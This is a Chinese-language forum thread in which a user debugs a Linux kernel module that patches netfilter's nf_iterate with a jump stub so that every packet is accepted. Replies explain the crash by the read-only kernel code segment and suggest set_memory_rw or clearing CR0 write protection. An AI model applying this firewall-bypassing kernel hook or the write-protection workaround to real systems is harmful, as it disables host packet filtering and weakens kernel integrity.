求大神来看看~通过替换目标地址的代码，来劫持系统函数的问题。

kenshinoor

学习Hacking the Linux Kernel Network Stack里边第六部分的代码。劫持Netfilter里边nf_iterate这个函数位置在net\netfilter\core.c。

很短的一段代码。劫持Netfilter里边的nf_iterate函数。

orig_nf_iterate是指向nf_iterate的函数指针。地址在System.map查到。

my_code是用来替换目标地址的代码。

劫持以后。直接返回NF_ACCEPT通过全部的包。

编译的结果。


可是只要insmod就直接死机。键盘等闪啊闪~

1. //hijack nf_iterate
   
2. 
   
3. #include <linux/netfilter.h>
   
4. #include <linux/kernel.h>
   
5. #include <linux/module.h>
   
6. #include <linux/netdevice.h>
   
7. #include <linux/inetdevice.h>
   
8. #include <asm/page.h>
   
9. #include <linux/smp_lock.h>
   
10. 
    
11. #define CODESIZE 10
    
12. 
    
13. static unsigned char my_code[CODESIZE] = "\xb8\x00\x00\x00\x00"
    
14.                                       "\x40\x90\x48"
    
15.                                       "\xff\xe0";
    
16. static unsigned char orig_code[CODESIZE];
    
17. 
    
18. //lock define
    
19. static spinlock_t hijack_lock = SPIN_LOCK_UNLOCKED;
    
20. #define HIJACK_LOCK   spin_lock_irqsave(&hijack_lock, sl_flags)
    
21. #define HIJACK_UNLOCK spin_unlock_irqrestore(&hijack_lock, sl_flags)
    
22. 
    
23. unsigned int (*orig_nf_iterate)(struct list_head *head,
    
24.                         struct sk_buff *skb,
    
25.                         unsigned int hook,
    
26.                         const struct net_device *indev,
    
27.                         const struct net_device *outdev,
    
28.                         struct list_head **i,
    
29.                         int (*okfn)(struct sk_buff *),
    
30.                         int hook_thresh)=0xc07ac3a0;
    
31. 
    
32. 
    
33. unsigned int my_nf_iterate(struct list_head *head,
    
34.                         struct sk_buff *skb,
    
35.                         unsigned int hook,
    
36.                         const struct net_device *indev,
    
37.                         const struct net_device *outdev,
    
38.                         struct list_head **i,
    
39.                         int (*okfn)(struct sk_buff *),
    
40.                         int hook_thresh){
    
41.     return NF_ACCEPT;
    
42. }
    
43. 
    
44. int init_module(void){
    
45.     int sl_flags;
    
46. 
    
47.     *(unsigned int *)(my_code + 1) = (unsigned int)my_nf_iterate;
    
48.     HIJACK_LOCK;
    
49. 
    
50.     memcpy(orig_code, (char *)orig_nf_iterate, CODESIZE);
    
51.     memcpy((char *)orig_nf_iterate, my_code, CODESIZE);
    
52. 
    
53.     HIJACK_UNLOCK;
    
54.     return 0;
    
55. }
    
56. 
    
57. void cleanup_module(){
    
58.     int sl_flags;
    
59. 
    
60.     lock_kernel();
    
61.     HIJACK_LOCK;
    
62. 
    
63.     memcpy((char *)orig_nf_iterate, orig_code, CODESIZE);
    
64. 
    
65.     HIJACK_UNLOCK;
    
66.     unlock_kernel();
    
67. }
    

复制代码

sanbiangongzi

1. 可是32位系统？
   
2. code本身好像没有问题
   
3. # as --32 aa.s -o aa
   
4. # objdump -d aa
   
5. 
   
6. aa:     file format elf32-i386
   
7. 
   
8. 
   
9. Disassembly of section .text:
   
10. 
    
11. 00000000 <.text>:
    
12.    0:   b8 00 00 00 00          mov    $0x0,%eax
    
13.    5:   40                      inc    %eax
    
14.    6:   90                      nop
    
15.    7:   48                      dec    %eax
    
16.    8:   ff e0                   jmp    *%eax

复制代码

只是 memcpy((char *)orig_nf_iterate, my_code, CODESIZE); 这句话中

orig_nf_iterate所在的位置是是只读？


Linux的内核有代码段ro的功能

kenshinoor

回复 2# sanbiangongzi


   

确实。。

很疑惑为什么这个文章里没有提到代码段可读的问题。。 http://www.ibm.com/developerworks/cn/linux/l-knldebug/index.html

请教一下，能强制写入代码段吗？

kenshinoor

回复 2# sanbiangongzi


    确实。。很疑惑这篇文章为什么完全没有提到代码段能不能写入的问题http://www.ibm.com/developerworks/cn/linux/l-knldebug/index.html

    请教一下，有什么办法可以写入呢？

sanbiangongzi

他用的是2.4的内核，可能当时的内核中没有对代码段做保护吧

我用的2.6.32中
init_post >>  mark_rodata_ro >> set_memory_ro 实现只读功能

你应该可以调用 set_memory_rw来修改代码段为可写

hmsghnh

貌似需要修改一下cr0还是那个寄存器，网上自己找一下